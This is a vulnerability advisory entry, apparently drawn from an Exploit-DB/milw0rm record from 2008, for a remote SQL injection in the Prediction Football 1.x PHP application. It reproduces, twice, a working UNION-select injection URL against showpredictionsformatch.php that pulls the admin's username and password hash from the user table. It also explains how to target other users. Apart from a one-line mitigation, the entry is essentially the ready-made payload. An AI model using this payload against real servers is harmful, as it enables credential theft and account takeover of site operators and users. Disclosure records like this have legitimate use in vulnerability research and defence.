Prediction Football v 1.x Remote SQL INJECTION

vendor:

Prediction Football

by:

0in from Dark-Coders Programming & Security Group

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Prediction Football

Affected Version From: 1.x

Affected Version To: 1.x

Patch Exists: NO

Related CWE: N/A

CPE: a:predictionfootball:prediction_football

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Web Server with support for PHP4.0 or greater, MySQL database

2008

Prediction Football v 1.x Remote SQL INJECTION

Prediction Football is a program that provides a web based administration config and automated prediction leagues. This program supports multiple languages. This script makes predictions simultaneously. This helps you to message other users and capable of multiple fixture creation. This requires web server with support for PHP4.0 or greater, MySQL database. Very easy to download and install the program and execute. An attacker can exploit this vulnerability by sending a malicious HTTP request to the vulnerable server with the following payload: http://target.domain/[path]/showpredictionsformatch.php?sid=dupa&matchid=-666/**/union/**/select/**/1,2,3,concat(0x757365723a,username),concat(0x7061737377643a,password),6,7/**/from/**/pluserdata/**/WHERE/**/userid=1/*, where userid=1 is the admin user.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

/*

                                       Prediction Football v 1.x Remote SQL INJECTION

Discovered by 0in from Dark-Coders Programming & Security Group.

!!!!!! > http://dark-coders.4rh.eu < !!!!!!

Contact: 0in(dot)email(at)gmail(dot)com

Greetz to all Dark-Coders Group Members: Die_Angel, Sun8hclf, M4r1usz, Djlinux, Aristo89

Script homepage: http://www.predictionfootball.com/

Description:  Prediction Football is a program that provides a web based administration 
config and automated prediction leagues. This program supports multiple languages. This 
script makes predictions simultaneously. This helps you to message other users and capable 
of multiple fixture creation. This requires web server with support for PHP4.0 or greater, 
MySQL database. Very easy to download and install the program and execute.

*/

Exploit:

http://target.domain/[path]/showpredictionsformatch.php?sid=dupa&matchid=-666/**/union/**/select/**/1,2,3,concat(0x757365723a,username),concat(0x7061737377643a,password),6,7/**/from/**/pluserdata/**/WHERE/**/userid=1/*  

userid=1 - admin user have that userid, you can change that to another user.

//EoFF

# milw0rm.com [2008-04-08]